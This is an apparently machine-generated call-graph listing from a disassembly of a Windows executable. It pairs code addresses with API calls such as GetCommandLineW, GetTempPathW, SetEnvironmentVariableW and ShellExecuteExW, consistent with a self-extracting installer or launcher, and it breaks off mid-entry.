401bb6 9043->9044 9045 401b86 GetLastError 9043->9045 9044->8932 9046 401ba0 GetFileAttributesW 9045->9046 9048 401b95 9045->9048 9046->9044 9046->9048 9047 401b96 SetLastError 9047->8932 9048->9044 9048->9047 9050 402187 19 API calls 9049->9050 9051 408dd3 wvsprintfW 9050->9051 9052 408ea2 9051->9052 9053 408df4 GetLastError FormatMessageW 9051->9053 9056 408cdb 27 API calls 9052->9056 9054 408e22 FormatMessageW 9053->9054 9055 408e37 lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 9053->9055 9054->9052 9054->9055 9060 408cdb 9055->9060 9058 408eae 9056->9058 9058->8942 9061 408d50 ??3@YAXPAX LocalFree 9060->9061 9062 408cea 9060->9062 9061->9058 9063 407c87 4 API calls 9062->9063 9064 408cf9 IsWindow 9063->9064 9065 408d10 IsBadReadPtr 9064->9065 9068 408d22 9064->9068 9065->9068 9066 407ce8 22 API calls 9067 408d48 9066->9067 9070 407a5b ??3@YAXPAX 9067->9070 9068->9066 9070->9061 9072 40ca28 2 API calls 9071->9072 9073 401a46 9072->9073 9073->8860 9073->8861 9079 40c88e 9074->9079 9077 40c993 9077->8811 9078 40c96e CreateFileW 9078->9077 9080 40c898 CloseHandle 9079->9080 9081 40c8a3 9079->9081 9080->9081 9081->9077 9081->9078 9083 410a59 9082->9083 9098 40ea08 9082->9098 9083->9098 9185 410817 9083->9185 9085 410c33 9086 40ce5c ctype 4 API calls 9085->9086 9086->9098 9088 410817 7 API calls 9089 410af5 9088->9089 9089->9085 9090 410b25 9089->9090 9192 40ce5c 9090->9192 9092 410b2e 9093 410bab 9092->9093 9095 4107a2 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 9092->9095 9093->9093 9094 40ce5c ctype 4 API calls 9093->9094 9096 410be7 9094->9096 9095->9092 9097 40ce5c ctype 4 API calls 9096->9097 9097->9098 9098->8757 9099 406eb0 InitializeCriticalSection 9098->9099 9099->8769 9226 40e214 9100->9226 9156 40e46e 9155->9156 9157 4107a2 4 API calls 9156->9157 9158 40e485 9157->9158 9158->8769 9186 40cdda ctype 3 API calls 9185->9186 9187 410823 9186->9187 9196 40cd11 9187->9196 9189 41082d 9190 41083f 9189->9190 9191 40ef63 4 API calls 9189->9191 9190->9085 9190->9088 9191->9189 9193 40ce3b 9192->9193 9204 40ccfd 9193->9204 9197 40cda5 9196->9197 9199 40cd24 9196->9199 9197->9189 9198 40cd33 _CxxThrowException 9198->9199 9199->9198 9200 40cd63 ??2@YAPAXI 9199->9200 9201 40cd95 ??3@YAXPAX 9199->9201 9200->9199 9202 40cd79 memcpy 9200->9202 9201->9197 9202->9201 9210 409f10 9204->9210 9213 401cfa 9204->9213 9216 40c7e0 9204->9216 9222 40b880 9204->9222 9205 40cd0e ??3@YAXPAX 9205->9092 9211 401d13 free 9210->9211 9212 409f1a 9211->9212 9212->9205 9214 401d01 VirtualFree 9213->9214 9215 401d12 9213->9215 9214->9215 9215->9205 9217 40c805 9216->9217 9218 401d13 free 9217->9218 9219 40c80e 9218->9219 9220 40c830 9219->9220 9221 40c827 ??3@YAXPAX 9219->9221 9220->9205 9221->9220 9223 40b8a6 9222->9223 9224 401d13 free 9223->9224 9225 40b8cc 9224->9225 9225->9205 9227 40cdda ctype 3 API calls 9226->9227 9228 40e21c 9227->9228 9229 40cdda ctype 3 API calls 9228->9229 9230 40e224 9229->9230 9231 40cdda ctype 3 API calls 9230->9231 9232 40e22c 9231->9232 9497 41382f __set_app_type __p__fmode __p__commode 9498 41389e 9497->9498 9499 4138b2 9498->9499 9500 4138a6 __setusermatherr 9498->9500 9509 4139a6 _controlfp 9499->9509 9500->9499 9502 4138b7 _initterm __getmainargs _initterm 9503 41390b GetStartupInfoA 9502->9503 9505 41393f GetModuleHandleA 9503->9505 9510 406d72 _EH_prolog 9505->9510 9509->9502 9513 405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 9510->9513 9868 401d21 GetModuleHandleW CreateWindowExW 9513->9868 9516 406d51 MessageBoxA 9518 406d68 exit _XcptFilter 9516->9518 9517 40575f 9517->9516 9519 405779 9517->9519 9520 401458 2 API calls 9519->9520 9521 4057b0 9520->9521 9522 401458 2 API calls 9521->9522 9523 4057bb 9522->9523 9871 4044c6 9523->9871 9528 4027c2 2 API calls 9529 4057f9 9528->9529 9880 402dd6 9529->9880 9531 405802 9894 4043f8 9531->9894 9535 405821 _wtol 9537 405837 9535->9537 9899 404903 #17 9537->9899 9538 4043f8 3 API calls 9539 405867 9538->9539 9540 4058a1 9539->9540 9541 40586d 9539->9541 9543 4043f8 3 API calls 9540->9543 10100 404e99 9541->10100 9544 4058ac 9543->9544 9546 4058b2 9544->9546 9547 4058bd 9544->9547 9545 405874 ??3@YAXPAX 10117 404513 9545->10117 10122 4052a7 9546->10122 9549 4043f8 3 API calls 9547->9549 9553 4058cc 9549->9553 9551 405885 ??3@YAXPAX ??3@YAXPAX 9551->9518 9552 405901 GetModuleFileNameW 9555 405913 9552->9555 9556 405925 9552->9556 9553->9552 9554 401172 2 API calls 9553->9554 9554->9552 9557 408dbf 57 API calls 9555->9557 9558 4043f8 3 API calls 9556->9558 9563 405872 9557->9563 9570 405947 9558->9570 9559 405ae3 9560 4013a9 2 API calls 9559->9560 9561 405af3 9560->9561 9562 4013a9 2 API calls 9561->9562 9567 405b00 9562->9567 9563->9545 9564 405a05 9564->9563 9565 405a38 9564->9565 9569 405a21 _wtol 9564->9569 9566 4043f8 3 API calls 9565->9566 9578 405a97 9566->9578 9568 405b85 9567->9568 9572 401370 2 API calls 9567->9572 9925 4023a0 9568->9925 9569->9565 9570->9559 9570->9563 9570->9564 9570->9565 9577 401526 2 API calls 9570->9577 9574 405b35 9572->9574 9576 401370 2 API calls 9574->9576 9575 401370 2 API calls 9579 405bab ??2@YAPAXI 9575->9579 9583 405b4b 9576->9583 9577->9570 9578->9559 9580 404a97 2 API calls 9578->9580 9581 405bb7 9579->9581 9582 405ac8 9580->9582 9928 40c9d7 9581->9928 9582->9559 9584 4013a9 2 API calls 9582->9584 9585 4013a9 2 API calls 9583->9585 9584->9559 9586 405b75 9585->9586 9588 402187 19 API calls 9586->9588 9590 405b7c 9588->9590 9593 4027c2 2 API calls 9590->9593 9591 405be4 9594 408dbf 57 API calls 9591->9594 9592 405c0a 9931 402823 9592->9931 9593->9568 9594->9563 9598 405c1f 9599 405c25 9598->9599 9600 405c49 9598->9600 9602 408dbf 57 API calls 9599->9602 9601 405cdb 9600->9601 9604 4043f8 3 API calls 9600->9604 9605 40cdda ctype 3 API calls 9601->9605 9603 405c2d ??3@YAXPAX 9602->9603 9603->9563 9606 405c60 9604->9606 9607 405ce3 9605->9607 9606->9601 9616 405c66 9606->9616 9608 405d08 9607->9608 10156 403400 9607->10156 9610 405d11 9608->9610 9611 405cbf ??3@YAXPAX 9608->9611 9614 405d82 9610->9614 9615 405d1d wsprintfW 9610->9615 9621 401458 2 API calls 9610->9621 9624 401370 ??2@YAPAXI ??3@YAXPAX 9610->9624 9626 402187 19 API calls 9610->9626 10185 4032d9 ??2@YAPAXI 9610->10185 10191 40269a ??3@YAXPAX ??3@YAXPAX 9610->10191 9611->9563 9613 405cfd ??3@YAXPAX 9613->9563 9965 404b06 9614->9965 9618 401458 2 API calls 9615->9618 9616->9611 10130 4054c1 9616->10130 9618->9610 9620 405c95 9620->9611 9622 405c9b 9620->9622 9621->9610 9623 408dbf 57 API calls 9622->9623 9625 405ca3 ??3@YAXPAX 9623->9625 9624->9610 9625->9563 9626->9610 9627 406006 9628 404b06 26 API calls 9627->9628 9629 406015 9628->9629 9631 40619d 9629->9631 10217 40244e AllocateAndInitializeSid 9629->10217 10024 4026b0 9631->10024 9636 40624e 10027 4045f4 9636->10027 9638 40603a 9641 401458 2 API calls 9638->9641 9639 402771 2 API calls 9682 4061b5 9639->9682 9643 406042 9641->9643 9646 401458 2 API calls 9643->9646 9644 4062e1 CoInitialize 9652 4026b0 lstrcmpW 9644->9652 9645 406275 9648 4026b0 lstrcmpW 9645->9648 9649 40604a GetCommandLineW 9646->9649 9651 406284 9648->9651 9653 404a97 2 API calls 9649->9653 9650 406250 ??3@YAXPAX 9650->9636 9654 406294 9651->9654 9658 402187 19 API calls 9651->9658 9655 406307 9652->9655 9656 40605a 9653->9656 10226 4041ab 9654->10226 9659 40631b 9655->9659 9662 401370 2 API calls 9655->9662 9660 402771 2 API calls 9656->9660 9657 401458 ??2@YAPAXI ??3@YAXPAX 9657->9682 9658->9654 9664 4041c4 16 API calls 9659->9664 9663 406065 9660->9663 9662->9659 9668 4048a9 2 API calls 9663->9668 9669 406321 9664->9669 9666 4013a9 2 API calls 9666->9682 9667 40421b lstrlenW lstrlenW _wcsnicmp 9675 405d8b 9667->9675 9671 406083 9668->9671 9672 4026b0 lstrcmpW 9669->9672 9670 407ce8 22 API calls 9673 4062b7 9670->9673 9676 4048c7 2 API calls 9671->9676 9677 406330 9672->9677 10229 407a5b ??3@YAXPAX 9673->10229 9674 401370 2 API calls 9674->9682 9675->9627 9675->9667 9699 405f6a _wtol 9675->9699 9726 40614a ??3@YAXPAX 9675->9726 10192 404d50 9675->10192 10203 40464b 9675->10203 9683 406090 9676->9683 9679 406344 9677->9679 9680 406337 _wtol 9677->9680 9684 40636a 9679->9684 10230 408f81 9679->10230 9680->9679 9681 4062c2 ??3@YAXPAX 9681->9563 9682->9636 9682->9639 9682->9650 9682->9657 9682->9666 9682->9674 9685 4032d9 7 API calls 9682->9685 10225 40269a ??3@YAXPAX ??3@YAXPAX 9682->10225 9686 4048c7 2 API calls 9683->9686 9689 40637e 9684->9689 9691 406355 ??3@YAXPAX 9684->9691 10246 408eb4 9684->10246 9685->9682 9687 40609d 9686->9687 10220 4048e5 9687->10220 9701 401458 2 API calls 9689->9701 9705 406503 ??3@YAXPAX 9689->9705 9706 4063bc GetKeyState 9689->9706 9710 406563 9689->9710 9711 401370 ??2@YAPAXI ??3@YAXPAX 9689->9711 9712 4026b0 lstrcmpW 9689->9712 9718 401526 ??2@YAPAXI ??3@YAXPAX 9689->9718 9727 406520 9689->9727 9729 406553 ??3@YAXPAX ??3@YAXPAX 9689->9729 9730 4064f8 ??3@YAXPAX 9689->9730 10273 408461 9689->10273 10286 4084df 9689->10286 9691->9684 9695 40622b ??3@YAXPAX 9697 4026b0 lstrcmpW 9695->9697 9696 401551 2 API calls 9698 4060b7 9696->9698 9697->9682 9700 4013a9 2 API calls 9698->9700 9699->9675 9703 4060c3 7 API calls 9700->9703 9701->9689 9704 404f67 9 API calls 9703->9704 9707 40610c 9704->9707 9705->9563 9706->9689 9708 406116 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9708 9709 406167 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9709 9708->9563 9709->9545 9709->9563 9713 406599 9710->9713 9714 40656b 9710->9714 9711->9689 9712->9689 9716 40133e 2 API calls 9713->9716 10033 404545 9714->10033 9719 4065a7 9716->9719 9718->9689 9723 4041c4 16 API calls 9719->9723 9722 4013a9 2 API calls 9724 406588 ??3@YAXPAX 9722->9724 9725 4065b0 9723->9725 9734 4065d0 9724->9734 9728 4065c1 ??3@YAXPAX 9725->9728 9732 4013a9 2 API calls 9725->9732 9726->9563 9731 408dbf 57 API calls 9727->9731 9728->9734 9729->9563 9730->9689 9733 40652c ??3@YAXPAX ??3@YAXPAX 9731->9733 9732->9728 9733->9563 9735 40661a 9734->9735 9736 40660d 9734->9736 10294 40851f 9735->10294 10046 40172c ??2@YAPAXI 9736->10046 9739 406616 9740 406657 9739->9740 9741 40662c 9739->9741 9742 4045f4 22 API calls 9740->9742 10302 4044b0 9741->10302 9743 40665c 9742->9743 9746 406c4d 9743->9746 9747 401458 2 API calls 9743->9747 9749 406cc5 9746->9749 9750 4026b0 lstrcmpW 9746->9750 9748 40667a 9747->9748 9793 40668d 9748->9793 10306 404a41 9748->10306 9752 406d08 ??3@YAXPAX ??3@YAXPAX 9749->9752 9758 4026b0 lstrcmpW 9749->9758 9756 406c7e 9750->9756 9753 406d21 9752->9753 9754 406d27 ??3@YAXPAX 9752->9754 9753->9754 9757 404513 4 API calls 9754->9757 9755 401458 ??2@YAPAXI ??3@YAXPAX 9755->9793 9756->9749 10373 404497 9756->10373 9759 406d38 ??3@YAXPAX ??3@YAXPAX 9757->9759 9760 406ce4 9758->9760 9759->9518 9760->9752 9763 406cf1 9760->9763 9767 40133e 2 API calls 9763->9767 9764 4066bc 9768 406ae3 ??3@YAXPAX ??3@YAXPAX 9764->9768 9769 4066c9 9764->9769 9765 4026b0 lstrcmpW 9765->9793 9766 407ce8 22 API calls 9771 406cba 9766->9771 9773 406d00 9767->9773 9772 406bec 9768->9772 9770 4048c7 2 API calls 9769->9770 9774 4066e5 9770->9774 10376 407a5b ??3@YAXPAX 9771->10376 9777 406c44 ??3@YAXPAX 9772->9777 9782 4045f4 22 API calls 9772->9782 10377 405304 9773->10377 9780 4048c7 2 API calls 9774->9780 9775 406729 9781 401370 2 API calls 9775->9781 9777->9746 9784 4066f2 9780->9784 9785 406732 9781->9785 9783 406bfb 9782->9783 10363 404dae 9783->10363 9787 4013a9 2 API calls 9784->9787 9789 4041f8 20 API calls 9785->9789 9792 4066fe ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9787->9792 9788 406b49 ??3@YAXPAX ??3@YAXPAX 9788->9772 9806 40673b 9789->9806 9790 401370 2 API calls 9790->9793 9791 406c14 SetCurrentDirectoryW 9794 404dae 4 API calls 9791->9794 9795 406725 9792->9795 9796 406afa 9792->9796 9793->9755 9793->9764 9793->9765 9793->9775 9793->9788 9793->9790 9797 401526 2 API calls 9793->9797 9798 406c3c 9794->9798 9795->9775 9799 4044b0 16 API calls 9796->9799 9800 4067c9 ??3@YAXPAX ??3@YAXPAX 9797->9800 9801 4044b0 16 API calls 9798->9801 9802 406aff 9799->9802 9800->9793 9801->9777 9803 408dbf 57 API calls 9802->9803 9804 406b08 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9563 9805 406b3e 9804->9805 9805->9563 9807 406868 _wtol 9806->9807 9808 404255 lstrlenW lstrlenW _wcsnicmp 9806->9808 9809 40692c 9806->9809 9807->9806 9808->9806 9810 406935 9809->9810 9811 406987 9809->9811 9812 40695a 9810->9812 9813 40693b 9810->9813 9814 4013a9 2 API calls 9811->9814 9815 401370 2 API calls 9812->9815 9816 401370 2 API calls 9813->9816 9817 406985 9814->9817 9819 406958 9815->9819 9818 406946 9816->9818 9820 4027c2 2 API calls 9817->9820 9822 4027c2 2 API calls 9818->9822 9821 4026b0 lstrcmpW 9819->9821 9823 406999 9820->9823 9825 40696f 9821->9825 9824 40694f 9822->9824 9826 401458 2 API calls 9823->9826 9827 4027c2 2 API calls 9824->9827 9825->9823 9830 4027c2 2 API calls 9825->9830 9828 4069a1 9826->9828 9827->9819 9829 404a97 2 API calls 9828->9829 9831 4069ae 9829->9831 9830->9817 9832 402771 2 API calls 9831->9832 9833 4069b9 9832->9833 9834 4041f8 20 API calls 9833->9834 9835 4069c2 9834->9835 9836 406a9d 9835->9836 10063 40241d 9835->10063 9837 406bcb ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9837 9839 406ab1 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9839 9837->9772 9839->9768 9840 4069d7 9840->9836 9841 4069f1 9840->9841 9843 4027c2 2 API calls 9840->9843 9842 4041f8 20 API calls 9841->9842 9844 406a09 9842->9844 9843->9841 9845 406a10 9844->9845 9846 406a7f 9844->9846 10072 4048a9 9845->10072 10315 40503e 9846->10315 9850 406a8d 9851 406b68 SetLastError 9850->9851 9852 406a98 9850->9852 9855 406b6f 9851->9855 10360 4023b5 9852->10360 9857 408dbf 57 API calls 9855->9857 9859 406b79 9857->9859 9858 401551 2 API calls 9860 406a45 ??3@YAXPAX ??3@YAXPAX 9858->9860 9861 4044b0 16 API calls 9859->9861 10082 404f67 9860->10082 9863 406b7e 7 API calls 9861->9863 9865 406bbe 9863->9865 9864 406a69 9866 406b60 ??3@YAXPAX 9864->9866 9867 406a77 ??3@YAXPAX 9864->9867 9865->9837 9866->9855 9867->9852 9869 401d56 SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9868->9869 9870 401d89 GetVersionExW 9868->9870 9869->9870 9870->9516 9870->9517 9872 401172 2 API calls 9871->9872 9873 4044db GetCommandLineW 9872->9873 9874 404a97 9873->9874 9875 404ad1 9874->9875 9876 404aa5 9874->9876 9877 404ac9 9875->9877 9878 401526 2 API calls 9875->9878 9876->9877 9879 401526 2 API calls 9876->9879 9877->9528 9878->9875 9879->9876 9881 401458 2 API calls 9880->9881 9887 402de6 9881->9887 9882 402ecc 9883 4013a9 2 API calls 9882->9883 9884 402ed9 ??3@YAXPAX 9883->9884 9884->9531 9886 401458 2 API calls 9886->9887 9887->9882 9887->9886 9888 401526 ??2@YAPAXI ??3@YAXPAX 9887->9888 9890 4013a9 2 API calls 9887->9890 10416 40283b 9887->10416 10419 402ad8 9887->10419 9888->9887 9891 402e46 ??3@YAXPAX 9890->9891 9892 401429 2 API calls 9891->9892 9893 402e5b ??3@YAXPAX ??3@YAXPAX 9892->9893 9893->9887 9895 404407 9894->9895 9896 404421 lstrlenW lstrlenW 9895->9896 9897 404444 9895->9897 10430 401c74 9896->10430 9897->9535 9897->9537 9900 40491a 9899->9900 9901 402131 3 API calls 9900->9901 9902 40491f 9901->9902 9903 402187 19 API calls 9902->9903 9904 404926 9903->9904 9905 402187 19 API calls 9904->9905 9906 404932 9905->9906 9907 402187 19 API calls 9906->9907 9908 40493e 9907->9908 9909 402187 19 API calls 9908->9909 9910 40494a 9909->9910 9911 402187 19 API calls 9910->9911 9912 404956 9911->9912 9913 402187 19 API calls 9912->9913 9914 404962 9913->9914 9915 402187 19 API calls 9914->9915 9921 40496e 9915->9921 9916 404989 SHGetSpecialFolderPathW 9917 4049a3 wsprintfW 9916->9917 9916->9921 9919 401458 2 API calls 9917->9919 9918 404a3c 9918->9538 9919->9921 9920 401458 2 API calls 9920->9921 9921->9916 9921->9918 9921->9920 9923 401370 ??2@YAPAXI ??3@YAXPAX 9921->9923 9924 4032d9 7 API calls 9921->9924 10440 40269a ??3@YAXPAX ??3@YAXPAX 9921->10440 9923->9921 9924->9921 10441 40236f LoadLibraryA GetProcAddress 9925->10441 9927 4023a5 9927->9575 10444 40c9b5 9928->10444 9932 40250f 2 API calls 9931->9932 9933 402837 9932->9933 9934 403c93 9933->9934 9935 40236f 3 API calls 9934->9935 9936 403ca1 9935->9936 9937 402823 2 API calls 9936->9937 9938 403cda 9937->9938 9939 402823 2 API calls 9938->9939 9940 403ce2 9939->9940 9941 402823 2 API calls 9940->9941 9942 403cea 9941->9942 10450 403ba2 9942->10450 9948 403d27 9949 403d80 9948->9949 9951 403ba2 7 API calls 9948->9951 9954 402bee 10 API calls 9948->9954 9958 402989 2 API calls 9948->9958 10496 402953 9948->10496 9950 403ba2 7 API calls 9949->9950 9952 403d96 9950->9952 9951->9948 9953 402bee 10 API calls 9952->9953 9955 403da8 9953->9955 9954->9948 10493 402989 9955->10493 9958->9948 9959 403e1e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9959->9598 9960 403ba2 7 API calls 9962 403dbe 9960->9962 9961 402bee 10 API calls 9961->9962 9962->9959 9962->9960 9962->9961 9963 402953 2 API calls 9962->9963 9964 402989 2 API calls 9962->9964 9963->9962 9964->9962 9966 4026b0 lstrcmpW 9965->9966 9967 404b1f 9966->9967 9968 404b6f 9967->9968 9970 401370 2 API calls 9967->9970 9969 4026b0 lstrcmpW 9968->9969 9971 404b8d 9969->9971 9972 404b36 9970->9972 9974 4026b0 lstrcmpW 9971->9974 9973 402187 19 API calls 9972->9973 9975 404b3d 9973->9975 9976 404ba5 9974->9976 9977 4027c2 2 API calls 9975->9977 9979 4026b0 lstrcmpW 9976->9979 9978 404b46 9977->9978 9980 401370 2 API calls 9978->9980 9981 404bbd 9979->9981 9982 404b5f 9980->9982 9984 4026b0 lstrcmpW 9981->9984 9983 402187 19 API calls 9982->9983 9985 404b66 9983->9985 9986 404bd5 9984->9986 9987 4027c2 2 API calls 9985->9987 9988 404bec 9986->9988 9989 404bdc lstrcmpiW 9986->9989 9987->9968 9990 4026b0 lstrcmpW 9988->9990 9989->9988 9991 404c02 9990->9991 9992 4026b0 lstrcmpW 9991->9992 9993 404c2f 9992->9993 9994 404c3c 9993->9994 10526 4043a6 9993->10526 9996 4026b0 lstrcmpW 9994->9996 10000 404c50 9996->10000 9997 404c70 9999 4026b0 lstrcmpW 9997->9999 10006 404c83 9999->10006 10000->9997 10001 4026b0 lstrcmpW 10000->10001 10530 40434d 10000->10530 10001->10000 10002 404ca3 10003 4026b0 lstrcmpW 10002->10003 10005 404caf 10003->10005 10007 4026b0 lstrcmpW 10005->10007 10006->10002 10008 4026b0 lstrcmpW 10006->10008 10534 40437e 10006->10534 10009 404cc0 10007->10009 10008->10006 10010 4026b0 lstrcmpW 10009->10010 10011 404cd1 10010->10011 10012 404ce7 10011->10012 10013 404cde _wtol 10011->10013 10014 4026b0 lstrcmpW 10012->10014 10013->10012 10015 404cf3 10014->10015 10016 404d03 10015->10016 10017 404cfa _wtol 10015->10017 10018 4026b0 lstrcmpW 10016->10018 10017->10016 10019 404d0f 10018->10019 10020 4026b0 lstrcmpW 10019->10020 10021 404d27 10020->10021 10022 4026b0 lstrcmpW 10021->10022 10023 404d3f 10022->10023 10023->9675 10542 40261a 10024->10542 10028 404648 10027->10028 10030 404605 10027->10030 10028->9644 10028->9645 10029 40133e 2 API calls 10029->10030 10030->10029 10031 4041f8 20 API calls 10030->10031 10032 404622 SetEnvironmentVariableW ??3@YAXPAX 10031->10032 10032->10028 10032->10030 10034 401458 2 API calls 10033->10034 10035 404556 10034->10035 10036 4027aa 2 API calls 10035->10036 10037 40455f GetTempPathW 10036->10037 10038 404578 10037->10038 10043 40458f 10037->10043 10039 4027aa 2 API calls 10038->10039 10040 404583 GetTempPathW 10039->10040 10040->10043 10041 4027aa 2 API calls 10042 4045b2 wsprintfW 10041->10042 10042->10043 10043->10041 10044 4045c9 GetFileAttributesW 10043->10044 10045 4045ed 10043->10045 10044->10043 10044->10045 10045->9722 10047 401745 10046->10047 10062 40d041 3 API calls 10047->10062 10048 401769 10049 401794 10048->10049 10546 40110a 10048->10546 10051 408dbf 57 API calls 10049->10051 10055 40179c 10051->10055 10053 4017bc 10054 4017d4 ??2@YAPAXI 10053->10054 10056 4036f1 88 API calls 10053->10056 10057 4017e0 10054->10057 10058 4017e7 10054->10058 10055->9739 10059 4017cf 10056->10059 10569 401470 10057->10569 10550 401611 10058->10550 10059->10054 10059->10055 10062->10048 10064 402426 10063->10064 10065 40242b 10063->10065 10064->9840 10066 40236f 3 API calls 10065->10066 10067 402430 10066->10067 10068 402441 10067->10068 10069 40243a 10067->10069 10068->9840 10987 4023e9 LoadLibraryA GetProcAddress 10069->10987 10073 4044c6 2 API calls 10072->10073 10074 4048b7 10073->10074 10075 401429 2 API calls 10074->10075 10076 4048c2 10075->10076 10077 4048c7 10076->10077 10078 40133e 2 API calls 10077->10078 10079 4048d5 10078->10079 10080 4027c2 2 API calls 10079->10080 10081 4048e0 10080->10081 10081->9858 10083 401458 2 API calls 10082->10083 10084 404f78 10083->10084 10085 401458 2 API calls 10084->10085 10086 404f80 memset 10085->10086 10087 404fae 10086->10087 10088 404a97 2 API calls 10087->10088 10089 404fd1 10088->10089 10090 401370 2 API calls 10089->10090 10091 404fdc 10090->10091 10092 404fe1 ??3@YAXPAX 10091->10092 10093 404ffa ShellExecuteExW 10091->10093 10094 404fec ??3@YAXPAX 10092->10094 10095 405014 10093->10095 10096 40503a 10093->10096 10094->9864 10097 405028 CloseHandle 10095->10097 10098 40501d WaitForSingleObject 10095->10098 10099 405031 ??3@YAXPAX 10096->10099 10097->10099 10098->10097 10099->10094 10101 407c87 4 API calls 10100->10101 10102 404eb5 10101->10102 10103 402187 19 API calls 10102->10103 10104 404ec3 10103->10104 10105 402771 2 API calls 10104->10105 10106 404ecd 10105->10106 10107 404f03 wsprintfW 10106->10107 10109 4027c2 ??2@YAPAXI ??3@YAXPAX 10106->10109 10108 4027c2 2 API calls 10107->10108 10110 404f31 10108->10110 10109->10106 10111 4027c2 2 API calls 10110->10111 10112 404f3e 10111->10112 10113 407ce8 22 API calls 10112->10113 10114 404f53 ??3@YAXPAX 10113->10114 10989 407a5b ??3@YAXPAX 10114->10989 10116 404f64 10116->9563 10118 40cdda ctype 3 API calls 10117->10118 10119 404521 10118->10119 10120 40ccfd ctype 3 API calls 10119->10120 10121 40ce45 ??3@YAXPAX 10120->10121 10121->9551 10123 4052b4 10122->10123 10129 4052d0 10122->10129 10126 4052c6 _wtol 10123->10126 10123->10129 10124 404f67 9 API calls 10125 4052f3 10124->10125 10127 405301 10125->10127 10128 4052fb GetLastError 10125->10128 10126->10129 10127->9563 10128->10127 10129->10124 10131 40ca5c 2 API calls 10130->10131 10132 4054ed 10131->10132 10133 405549 10132->10133 10135 402771 2 API calls 10132->10135 10134 402823 2 API calls 10133->10134 10136 405551 10134->10136 10141 4054fc 10135->10141 10137 4028b9 2 API calls 10136->10137 10138 40555e 10137->10138 10139 402953 2 API calls 10138->10139 10143 40556b 10139->10143 10140 4055ba ??3@YAXPAX 10146 4055b6 10140->10146 10141->10140 10142 4036f1 88 API calls 10141->10142 10144 405520 10142->10144 10145 402953 2 API calls 10143->10145 10144->10140 10148 40ca5c 2 API calls 10144->10148 10147 405578 10145->10147 10146->9620 10149 402953 2 API calls 10147->10149 10151 40553c 10148->10151 10150 405585 10149->10150 10152 40d0a5 2 API calls 10150->10152 10151->10140 10153 405540 ??3@YAXPAX 10151->10153 10154 405599 10152->10154 10153->10133 10154->10140 10155 4055a2 ??3@YAXPAX 10154->10155 10155->10146 10157 402823 2 API calls 10156->10157 10173 403415 10157->10173 10158 4036b4 ??3@YAXPAX 10159 4036eb 10158->10159 10159->9608 10159->9613 10160 401458 ??2@YAPAXI ??3@YAXPAX 10160->10173 10161 402823 2 API calls 10161->10173 10162 402ad8 ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 10162->10173 10163 4013a9 2 API calls 10164 403486 ??3@YAXPAX ??3@YAXPAX 10163->10164 10165 4036c0 10164->10165 10164->10173 10995 402d30 10165->10995 10169 4036e1 ??3@YAXPAX 10169->10159 10170 403593 strncmp 10172 40357e strncmp 10170->10172 10170->10173 10172->10170 10172->10173 10173->10158 10173->10160 10173->10161 10173->10162 10173->10163 10173->10165 10173->10170 10175 40292b ??2@YAPAXI ??3@YAXPAX 10173->10175 10176 4013a9 2 API calls 10173->10176 10177 40292b 2 API calls 10173->10177 10181 403648 lstrlenW wcsncmp 10173->10181 10182 40261a lstrcmpW 10173->10182 10183 4032d9 7 API calls 10173->10183 10184 401370 2 API calls 10173->10184 10990 402662 10173->10990 10994 40269a ??3@YAXPAX ??3@YAXPAX 10173->10994 10175->10173 10178 403600 ??3@YAXPAX 10176->10178 10177->10172 10179 402dd6 9 API calls 10178->10179 10180 403611 lstrcmpW 10179->10180 10180->10173 10181->10173 10182->10173 10183->10173 10184->10173 10186 4032e8 10185->10186 10188 4032f3 10185->10188 11014 4029b7 10186->11014 10189 4107a2 4 API calls 10188->10189 10190 4032ff 10189->10190 10190->9610 10191->9610 10193 402771 2 API calls 10192->10193 10194 404d62 10193->10194 10195 4027c2 2 API calls 10194->10195 10196 404d6f 10195->10196 10197 404d8b 10196->10197 10198 401526 2 API calls 10196->10198 10199 4027c2 2 API calls 10197->10199 10198->10196 10200 404d95 10199->10200 10201 40464b 94 API calls 10200->10201 10202 404da0 ??3@YAXPAX 10201->10202 10202->9675 10204 404662 lstrlenW 10203->10204 10205 40468e 10203->10205 10206 401c74 CharUpperW 10204->10206 10205->9675 10207 404678 10206->10207 10207->10204 10207->10205 10208 404695 10207->10208 10209 402771 2 API calls 10208->10209 10212 40469e 10209->10212 11019 402b20 10212->11019 10213 403400 87 API calls 10214 40470c 10213->10214 10215 404716 ??3@YAXPAX ??3@YAXPAX 10214->10215 10216 40472d ??3@YAXPAX ??3@YAXPAX 10214->10216 10215->10205 10216->10205 10218 402491 CheckTokenMembership FreeSid 10217->10218 10219 4024ab 10217->10219 10218->10219 10219->9631 10219->9638 10221 40133e 2 API calls 10220->10221 10222 4048f3 10221->10222 10223 401526 2 API calls 10222->10223 10224 4048fe 10223->10224 10224->9696 10225->9695 10227 407c87 4 API calls 10226->10227 10228 4041b3 10227->10228 10228->9670 10229->9681 10234 409205 10230->10234 10243 408fa0 10230->10243 10231 4026b0 lstrcmpW 10231->10243 10232 407c87 4 API calls 10232->10243 10233 40851f 25 API calls 10233->10243 10234->9691 10235 4084df 25 API calls 10235->10243 10236 408461 25 API calls 10236->10243 10238 4041ab 4 API calls 10238->10243 10240 402187 19 API calls 10240->10243 10241 408dbf 57 API calls 10241->10243 10242 404497 4 API calls 10242->10243 10243->10231 10243->10232 10243->10233 10243->10234 10243->10235 10243->10236 10243->10238 10243->10240 10243->10241 10243->10242 10244 408d52 27 API calls 10243->10244 10245 407ce8 22 API calls 10243->10245 11029 407d62 10243->11029 11033 407a5b ??3@YAXPAX 10243->11033 10244->10243 10245->10243 10247 4026b0 lstrcmpW 10246->10247 10248 408ec8 10247->10248 10249 408ed6 10248->10249 11034 401bdf GetStdHandle WriteFile 10248->11034 10251 408ee9 10249->10251 11035 401bdf GetStdHandle WriteFile 10249->11035 10253 408efe 10251->10253 11036 